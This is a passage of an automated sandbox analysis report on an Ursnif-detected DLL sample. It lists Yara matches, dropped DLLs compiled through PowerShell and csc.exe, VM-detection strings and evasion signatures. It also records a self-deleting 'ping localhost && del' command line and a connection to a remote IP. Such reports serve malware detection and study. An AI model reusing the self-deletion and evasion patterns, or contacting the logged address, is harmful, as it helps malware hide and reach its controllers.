                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05953D9F push ecx; ret 2_2_05953DAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05933495 push ecx; mov dword ptr [esp], 00000002h2_2_05933496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059538A0 push ecx; ret 2_2_059538A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,2_2_0593EC00
                      Source: 626a983c091a8.tiff.dllStatic PE information: real checksum: 0x79835 should be: 0xa2af3
                      Source: tn4ral5l.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x2793
                      Source: o1ulwvct.dll.22.drStatic PE information: real checksum: 0x0 should be: 0x1f56
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6784, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.49494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f0a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f894a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4fb6b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5256Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4164Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 7.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059365C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_059365C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059399BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_059399BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0594BAD1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0593FD47
                      Source: explorer.exe, 0000001C.00000000.389877522.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001C.00000000.389296531.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001C.00000000.391000685.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.424200034.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000027.00000000.567670416.000001F9B9A59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.417737706.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.390729002.0000000005448000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&]$
                      Source: explorer.exe, 0000001C.00000000.391000685.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@@
                      Source: explorer.exe, 0000001C.00000000.389296531.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: mshta.exe, 00000012.00000002.325022783.0000018711881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000012.00000002.325022783.0000018711881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.417737706.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001C.00000000.424200034.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,2_2_0593EC00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05938FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_05938FEC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.140.115.8 80Jump to behavior
                      Maps a DLL or memory area into another process
